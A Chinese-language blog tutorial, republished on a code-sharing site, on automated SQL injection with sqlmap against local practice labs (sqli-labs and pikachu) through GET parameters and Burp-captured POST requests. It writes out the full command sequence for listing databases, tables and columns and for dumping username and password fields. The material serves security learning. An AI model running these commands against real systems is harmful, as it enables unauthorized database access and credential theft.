ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 数据库> 文章详细

SQL注入之GET与POST自动注入

2022-06-23 22:37:44  阅读:248  来源: 互联网

标签:sqlmap users GET python 数据库 py POST id 注入


环境的准备:

  Python 3.8,Windows操作系统,Sqlmap。

 

Sqlmap简介:

  Sqlmap是开源的自动化SQL注入工具,由Python写成。它支持的数据库有MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。

 

GET注入的一般步骤:

python sqlmap.py -h  #查看可使用指令
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1"  #判断注入点
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" --dbs  #查看所有数据库名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security --tables  #查看security数据库中的所有表名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users --columns  #查看security数据库中users表的所有字段名
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-3/index.php?id=1" -D security -T users -C id,password,username --dump  #查看security数据库中users表的id,password,username的字段信息

POST注入的一般步骤:

使用burpsuite进行抓包,将数据包保存在txt文件中
python sqlmap.py -r C:\Users\Desktop\1234.txt
python sqlmap.py -r C:\Users\Desktop\1234.txt --dbs
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu --tables
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users --columns
python sqlmap.py -r C:\Users\Desktop\1234.txt -D pikachu -T users -C id,password,username --dump

 

GET注入实战:

目标网站:sqli-labs靶场

1.查看sqlmap可使用的指令

 2.在网站中输入参数,判断是否存在注入点

 3.查看数据库信息

 

 4.查看security数据库中的所有表名

 

 5.查看security数据库中users表的所有字段名

 

 6.查看security数据库中users表的id,password,username的字段信息,可以看到sqli-labs靶场数据库的所有账号密码信息

 

 

POST注入实战:

目标网站:pikachu靶场

1.在pikachu靶场填入表单信息,使用burpsuite进行抓包,将其保存到txt文件中

2.判断是否存在注入点

 3.查看数据库信息

 

  4.查看pikachu数据库中的所有表名

 

  5.查看pikachu数据库中users表的所有字段名

 

  6.查看pikachu数据库中users表的id,password,username的字段信息,可以看到pikachu靶场数据库的所有账号密码信息

 

标签:sqlmap,users,GET,python,数据库,py,POST,id,注入
来源: https://www.cnblogs.com/AjieBlog/p/16406973.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有